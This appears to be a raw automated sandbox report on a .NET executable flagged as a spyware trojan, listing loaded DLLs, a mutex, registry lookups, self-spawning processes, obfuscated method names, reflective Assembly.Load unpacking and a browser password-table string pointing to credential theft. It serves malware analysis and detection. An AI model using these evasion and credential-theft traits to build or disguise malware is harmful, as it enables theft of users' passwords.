Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, QnmRDFJR3fB8REvONB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, QnmRDFJR3fB8REvONB.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/1@4/4

Source: C:\Users\user\Desktop\UqdykLLTA2.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UqdykLLTA2.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Mutant created: \Sessions\1\BaseNamedObjects\JUhdRhnutsZzOjwbrz

Source: UqdykLLTA2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: UqdykLLTA2.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\UqdykLLTA2.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.0000000003514000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.0000000003506000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: UqdykLLTA2.exe	Virustotal: Detection: 80%
Source: UqdykLLTA2.exe	ReversingLabs: Detection: 71%

Source: unknown	Process created: C:\Users\user\Desktop\UqdykLLTA2.exe "C:\Users\user\Desktop\UqdykLLTA2.exe"
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process created: C:\Users\user\Desktop\UqdykLLTA2.exe "C:\Users\user\Desktop\UqdykLLTA2.exe"
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process created: C:\Users\user\Desktop\UqdykLLTA2.exe "C:\Users\user\Desktop\UqdykLLTA2.exe"
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process created: C:\Users\user\Desktop\UqdykLLTA2.exe "C:\Users\user\Desktop\UqdykLLTA2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process created: C:\Users\user\Desktop\UqdykLLTA2.exe "C:\Users\user\Desktop\UqdykLLTA2.exe"	Jump to behavior

Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\UqdykLLTA2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\UqdykLLTA2.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: UqdykLLTA2.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: UqdykLLTA2.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, QnmRDFJR3fB8REvONB.cs	.Net Code: KN8GZg0InR System.Reflection.Assembly.Load(byte[])
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, QnmRDFJR3fB8REvONB.cs	.Net Code: KN8GZg0InR System.Reflection.Assembly.Load(byte[])
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, QnmRDFJR3fB8REvONB.cs	.Net Code: KN8GZg0InR System.Reflection.Assembly.Load(byte[])
Source: 0.2.UqdykLLTA2.exe.42ca528.2.raw.unpack, MainForm.cs	.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_018FE958 pushfd ; retf	0_2_018FE959
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_018FF043 pushad ; iretd	0_2_018FF049
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_0767BA10 push cs; ret	0_2_0767BA11
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_0788239D push FFFFFF8Bh; iretd	0_2_0788239F
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078A45E0 push eax; ret	0_2_078A45E1

Source: UqdykLLTA2.exe

Static PE information: section name: .text entropy: 7.745586888307881

Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, tW4EPO9Gs9iw77strgc.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DjhYdB2Tth', 'ka3YuE2Ku0', 'seaYkhP0Xj', 'rD2YYnmQIN', 'o0fYCdZ2wI', 'V10YtirerP', 'bNfYoWcI2J'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, N2QLE3s662ryl7Iias.cs	High entropy of concatenated method names: 'lK3M3mtfSo', 'Hl0MHv6pVR', 'WrSM4q4ken', 'ey2MsTBUi0', 'DK9MfS75tF', 'QkDMQiIGXr', 'a13MP278p0', 'A15MNUmRvv', 'uVZMdABHKd', 'jEFMup6r5G'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, wJrbSqXQRBSlu54jLJ.cs	High entropy of concatenated method names: 'kCeVFyWaiM', 'ku8VrmjTEY', 'Xc3MSjt9IN', 'jkTMcTokIJ', 'yo2MOe6Sdt', 'SByMA3Za6I', 'T2NMvdareY', 'WT0Mx2aWrH', 'XicMhOgEgb', 'CSMMnKs6rA'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, TuWrLDbO7BHS28nJkC.cs	High entropy of concatenated method names: 'mmluMhRKkT', 'gxnuVUatEX', 'GlNu5qFD8K', 'tqcu1sfXcF', 'Wbhudho3bo', 'vMbuJj0vOn', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, qhCMLXG09OUqG7U535.cs	High entropy of concatenated method names: 'rIe91q6vUK', 'VvP9JbBgTD', 'A669E2ryl7', 'yia9wsoJrb', 'j4j9fLJTmP', 'A9D9Ql6gUx', 'blmgxF9a2EX5oRVKCK', 'K0UqYSSIWkJWfZyn9I', 'DfL99sPatw', 'R9t9R2EP0x'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, PmP39Dql6gUxWtjOZt.cs	High entropy of concatenated method names: 'ah45LcekRq', 'YSH57yqwof', 'XOF5VTjcB3', 'pkQ51DQae1', 'nnF5JtK4p6', 'BU6VW2jXfG', 'r86VK6FrmE', 'vGkV0Gxvos', 'Vs6VyVoUqZ', 'UyBVjaQAK1'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, jWKGVIjcFMVgphwNTP.cs	High entropy of concatenated method names: 'TFudqGFDbI', 'SlJdiNTYZJ', 'LVMdSJruqT', 'x9OdcYeIdE', 'EGndOwd61m', 'eVTdAxElY8', 'ImwdvgyN18', 'vFEdxn5tUx', 'HwqdhLPqop', 'QpDdnEaDAb'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, ep7ohB7W7lhUl9qNVl.cs	High entropy of concatenated method names: 'Dispose', 'zHl9jbc1hT', 'aWSlieJsLv', 'cs7s2URC8A', 'iqV9bSS3UD', 'nUj9ziKJNC', 'ProcessDialogKey', 'Eb5l6WKGVI', 'IFMl9Vgphw', 'rTPllBuWrL'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, EJTdXMT4v12FlXTOst.cs	High entropy of concatenated method names: 'IEhm4QQqUZ', 'PfDmsOt3gP', 'h4LmqZbjv6', 'VwwmiwetkD', 'fvSmcDiO7Z', 'uQtmOB0BHN', 'Kv0mvn1ahr', 'YZqmxKPiY7', 'Cw2mnuxh0v', 'NI3mp0UonP'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, fHjkEEMXvsJjY5J9xj.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Juxljk3CGI', 'nZalbFMfdp', 'rEJlzGbo0U', 'N6FR6NM7Ha', 'mYJR9EJAn5', 'H0JRlG5ev7', 'ljWRR6XmQ7', 'QJ23QqyFkyUIXFSFnRr'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, YKs5MSvJZJ9aYu0E82.cs	High entropy of concatenated method names: 'Rcd18LMsaq', 'zNn1M4jdEe', 'Kc815WEfeY', 'KgD5bECMoX', 'ckg5zYacjl', 'K6d16cyflQ', 'rmw19fHmjd', 'jCl1ldF8LN', 'pFt1RJD0Z5', 'fBT1GygJ20'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, SBRGILBnrOoaGSPMoe.cs	High entropy of concatenated method names: 'bI8PEr3KtB', 'jypPwuTvCs', 'ToString', 'xcvP8bwTHW', 'NYiP7Rgy7d', 'c34PMA1cJf', 'xAvPVqU9ZE', 'XnEP50v1We', 'A9tP1OFpqc', 'MJfPJ4TeHs'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, xq6vUK4KvPbBgTDCEE.cs	High entropy of concatenated method names: 'MOb7gvuwwg', 'd5m7aKPioy', 'FeP7DKcIgF', 's9a7BMQFhN', 'aQZ7WIg6CR', 'GPO7KcoQHI', 'Jr4703To7l', 'EHC7yXOd30', 'G6G7jHlrnw', 'T2R7br9V9L'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, IJr43mzeV3ygPM2Z4L.cs	High entropy of concatenated method names: 'T3quHYlI53', 'BTQu4uuD5A', 'PWbusi7PKU', 'AbuuqG0nub', 'orMuiOQHjx', 'HPaucHyb5S', 'FucuO0301T', 'eSEuo3xsBd', 'Dd9ueEUsKS', 'm5suIq0X2A'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, xlAYIbgcGyT3E3UKEJ.cs	High entropy of concatenated method names: 'apwfnr5lEu', 'CobfUfiTq3', 'Skhfg5DjWi', 'pNafaIy8lU', 'BgvfiGyydI', 'wpNfSio0L2', 'e0ufcPCXdq', 'rqhfOChcku', 'La1fAt7AS6', 'a9lfvViiJy'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, lR7P46lQl4vGorSblT.cs	High entropy of concatenated method names: 'jrNZjJ0My', 'zML39JBtX', 'NCkHPOkfu', 'QkFrG0Msr', 'hDpsiAwu4', 'B8CXhdFF2', 'LInBDTdOUjtpGbF8q3', 'HEnqypYlpmpDxdWPSU', 'nJxN5ZBqa', 'aWmuukaPx'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, yYao95K08DUdQC3iJB.cs	High entropy of concatenated method names: 'Hr9Py1hVF8', 'OZxPbJnoZm', 'oA5N6XEThK', 'PjhN9aGcB3', 'DCTPp0f7Af', 'V3CPUr58xn', 'EAwPTF2NOM', 'POJPg1tBqa', 'yq6Pa8LvWt', 'k20PDWQL5H'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, QnmRDFJR3fB8REvONB.cs	High entropy of concatenated method names: 'E3oRLr3uAR', 'X2hR8LP99t', 'EXdR7TiS44', 'FU8RM1qxVE', 'bcTRVVZVBx', 'ms9R5XTBEw', 'LbBR1xMAYW', 'efERJEFJ33', 'yYnR2AFrbX', 'xysREu6os3'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, ANAY5q99wlsQfZjI5fR.cs	High entropy of concatenated method names: 'B6eubNW6sq', 'dyDuzGVQYn', 'gFak6P54Co', 'pIjk9lpm05', 'ILgkl7ap10', 'ORCkR4358n', 'HFXkGgQ40P', 'eCikL4x9ub', 'Rghk8wFt9c', 'zITk77Iw6k'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, qcr6Mx0YyZHlbc1hT5.cs	High entropy of concatenated method names: 'xhZdfFp1uY', 'S3vdPYKNVI', 'HFeddAQic7', 'dSodkLsYOy', 'FkwdCPsOAg', 'kTHdoepfFf', 'Dispose', 'df8N8QbZnX', 'qRMN7OVvLd', 'stcNM3Yd5q'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, RlYPIh96Hi2ULTTKCdM.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BKMupNsVjs', 'fTtuUynVKf', 'yyeuTyATyS', 'D5FugbjEY2', 'DLtuaZI4le', 'nMfuDBVvkZ', 'BcruB7Yndx'
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, XVcimchNyDWrTgCFYJ.cs	High entropy of concatenated method names: 'sAB1ejRae5', 'Bs21IlFYDs', 'b2P1ZL3Xue', 'D3S13WNM9u', 'BS51F7bTXQ', 'Mtt1HAxI5g', 'BLm1rq08EI', 'XHW149AuUi', 'YUS1soHAXm', 'pfV1XH6kdu'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, tW4EPO9Gs9iw77strgc.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DjhYdB2Tth', 'ka3YuE2Ku0', 'seaYkhP0Xj', 'rD2YYnmQIN', 'o0fYCdZ2wI', 'V10YtirerP', 'bNfYoWcI2J'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, N2QLE3s662ryl7Iias.cs	High entropy of concatenated method names: 'lK3M3mtfSo', 'Hl0MHv6pVR', 'WrSM4q4ken', 'ey2MsTBUi0', 'DK9MfS75tF', 'QkDMQiIGXr', 'a13MP278p0', 'A15MNUmRvv', 'uVZMdABHKd', 'jEFMup6r5G'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, wJrbSqXQRBSlu54jLJ.cs	High entropy of concatenated method names: 'kCeVFyWaiM', 'ku8VrmjTEY', 'Xc3MSjt9IN', 'jkTMcTokIJ', 'yo2MOe6Sdt', 'SByMA3Za6I', 'T2NMvdareY', 'WT0Mx2aWrH', 'XicMhOgEgb', 'CSMMnKs6rA'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, TuWrLDbO7BHS28nJkC.cs	High entropy of concatenated method names: 'mmluMhRKkT', 'gxnuVUatEX', 'GlNu5qFD8K', 'tqcu1sfXcF', 'Wbhudho3bo', 'vMbuJj0vOn', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, qhCMLXG09OUqG7U535.cs	High entropy of concatenated method names: 'rIe91q6vUK', 'VvP9JbBgTD', 'A669E2ryl7', 'yia9wsoJrb', 'j4j9fLJTmP', 'A9D9Ql6gUx', 'blmgxF9a2EX5oRVKCK', 'K0UqYSSIWkJWfZyn9I', 'DfL99sPatw', 'R9t9R2EP0x'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, PmP39Dql6gUxWtjOZt.cs	High entropy of concatenated method names: 'ah45LcekRq', 'YSH57yqwof', 'XOF5VTjcB3', 'pkQ51DQae1', 'nnF5JtK4p6', 'BU6VW2jXfG', 'r86VK6FrmE', 'vGkV0Gxvos', 'Vs6VyVoUqZ', 'UyBVjaQAK1'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, jWKGVIjcFMVgphwNTP.cs	High entropy of concatenated method names: 'TFudqGFDbI', 'SlJdiNTYZJ', 'LVMdSJruqT', 'x9OdcYeIdE', 'EGndOwd61m', 'eVTdAxElY8', 'ImwdvgyN18', 'vFEdxn5tUx', 'HwqdhLPqop', 'QpDdnEaDAb'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, ep7ohB7W7lhUl9qNVl.cs	High entropy of concatenated method names: 'Dispose', 'zHl9jbc1hT', 'aWSlieJsLv', 'cs7s2URC8A', 'iqV9bSS3UD', 'nUj9ziKJNC', 'ProcessDialogKey', 'Eb5l6WKGVI', 'IFMl9Vgphw', 'rTPllBuWrL'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, EJTdXMT4v12FlXTOst.cs	High entropy of concatenated method names: 'IEhm4QQqUZ', 'PfDmsOt3gP', 'h4LmqZbjv6', 'VwwmiwetkD', 'fvSmcDiO7Z', 'uQtmOB0BHN', 'Kv0mvn1ahr', 'YZqmxKPiY7', 'Cw2mnuxh0v', 'NI3mp0UonP'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, fHjkEEMXvsJjY5J9xj.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Juxljk3CGI', 'nZalbFMfdp', 'rEJlzGbo0U', 'N6FR6NM7Ha', 'mYJR9EJAn5', 'H0JRlG5ev7', 'ljWRR6XmQ7', 'QJ23QqyFkyUIXFSFnRr'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, YKs5MSvJZJ9aYu0E82.cs	High entropy of concatenated method names: 'Rcd18LMsaq', 'zNn1M4jdEe', 'Kc815WEfeY', 'KgD5bECMoX', 'ckg5zYacjl', 'K6d16cyflQ', 'rmw19fHmjd', 'jCl1ldF8LN', 'pFt1RJD0Z5', 'fBT1GygJ20'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, SBRGILBnrOoaGSPMoe.cs	High entropy of concatenated method names: 'bI8PEr3KtB', 'jypPwuTvCs', 'ToString', 'xcvP8bwTHW', 'NYiP7Rgy7d', 'c34PMA1cJf', 'xAvPVqU9ZE', 'XnEP50v1We', 'A9tP1OFpqc', 'MJfPJ4TeHs'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, xq6vUK4KvPbBgTDCEE.cs	High entropy of concatenated method names: 'MOb7gvuwwg', 'd5m7aKPioy', 'FeP7DKcIgF', 's9a7BMQFhN', 'aQZ7WIg6CR', 'GPO7KcoQHI', 'Jr4703To7l', 'EHC7yXOd30', 'G6G7jHlrnw', 'T2R7br9V9L'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, IJr43mzeV3ygPM2Z4L.cs	High entropy of concatenated method names: 'T3quHYlI53', 'BTQu4uuD5A', 'PWbusi7PKU', 'AbuuqG0nub', 'orMuiOQHjx', 'HPaucHyb5S', 'FucuO0301T', 'eSEuo3xsBd', 'Dd9ueEUsKS', 'm5suIq0X2A'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, xlAYIbgcGyT3E3UKEJ.cs	High entropy of concatenated method names: 'apwfnr5lEu', 'CobfUfiTq3', 'Skhfg5DjWi', 'pNafaIy8lU', 'BgvfiGyydI', 'wpNfSio0L2', 'e0ufcPCXdq', 'rqhfOChcku', 'La1fAt7AS6', 'a9lfvViiJy'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, lR7P46lQl4vGorSblT.cs	High entropy of concatenated method names: 'jrNZjJ0My', 'zML39JBtX', 'NCkHPOkfu', 'QkFrG0Msr', 'hDpsiAwu4', 'B8CXhdFF2', 'LInBDTdOUjtpGbF8q3', 'HEnqypYlpmpDxdWPSU', 'nJxN5ZBqa', 'aWmuukaPx'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, yYao95K08DUdQC3iJB.cs	High entropy of concatenated method names: 'Hr9Py1hVF8', 'OZxPbJnoZm', 'oA5N6XEThK', 'PjhN9aGcB3', 'DCTPp0f7Af', 'V3CPUr58xn', 'EAwPTF2NOM', 'POJPg1tBqa', 'yq6Pa8LvWt', 'k20PDWQL5H'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, QnmRDFJR3fB8REvONB.cs	High entropy of concatenated method names: 'E3oRLr3uAR', 'X2hR8LP99t', 'EXdR7TiS44', 'FU8RM1qxVE', 'bcTRVVZVBx', 'ms9R5XTBEw', 'LbBR1xMAYW', 'efERJEFJ33', 'yYnR2AFrbX', 'xysREu6os3'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, ANAY5q99wlsQfZjI5fR.cs	High entropy of concatenated method names: 'B6eubNW6sq', 'dyDuzGVQYn', 'gFak6P54Co', 'pIjk9lpm05', 'ILgkl7ap10', 'ORCkR4358n', 'HFXkGgQ40P', 'eCikL4x9ub', 'Rghk8wFt9c', 'zITk77Iw6k'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, qcr6Mx0YyZHlbc1hT5.cs	High entropy of concatenated method names: 'xhZdfFp1uY', 'S3vdPYKNVI', 'HFeddAQic7', 'dSodkLsYOy', 'FkwdCPsOAg', 'kTHdoepfFf', 'Dispose', 'df8N8QbZnX', 'qRMN7OVvLd', 'stcNM3Yd5q'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, RlYPIh96Hi2ULTTKCdM.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BKMupNsVjs', 'fTtuUynVKf', 'yyeuTyATyS', 'D5FugbjEY2', 'DLtuaZI4le', 'nMfuDBVvkZ', 'BcruB7Yndx'
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, XVcimchNyDWrTgCFYJ.cs	High entropy of concatenated method names: 'sAB1ejRae5', 'Bs21IlFYDs', 'b2P1ZL3Xue', 'D3S13WNM9u', 'BS51F7bTXQ', 'Mtt1HAxI5g', 'BLm1rq08EI', 'XHW149AuUi', 'YUS1soHAXm', 'pfV1XH6kdu'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, tW4EPO9Gs9iw77strgc.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DjhYdB2Tth', 'ka3YuE2Ku0', 'seaYkhP0Xj', 'rD2YYnmQIN', 'o0fYCdZ2wI', 'V10YtirerP', 'bNfYoWcI2J'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, N2QLE3s662ryl7Iias.cs	High entropy of concatenated method names: 'lK3M3mtfSo', 'Hl0MHv6pVR', 'WrSM4q4ken', 'ey2MsTBUi0', 'DK9MfS75tF', 'QkDMQiIGXr', 'a13MP278p0', 'A15MNUmRvv', 'uVZMdABHKd', 'jEFMup6r5G'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, wJrbSqXQRBSlu54jLJ.cs	High entropy of concatenated method names: 'kCeVFyWaiM', 'ku8VrmjTEY', 'Xc3MSjt9IN', 'jkTMcTokIJ', 'yo2MOe6Sdt', 'SByMA3Za6I', 'T2NMvdareY', 'WT0Mx2aWrH', 'XicMhOgEgb', 'CSMMnKs6rA'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, TuWrLDbO7BHS28nJkC.cs	High entropy of concatenated method names: 'mmluMhRKkT', 'gxnuVUatEX', 'GlNu5qFD8K', 'tqcu1sfXcF', 'Wbhudho3bo', 'vMbuJj0vOn', 'Next', 'Next', 'Next', 'NextBytes'
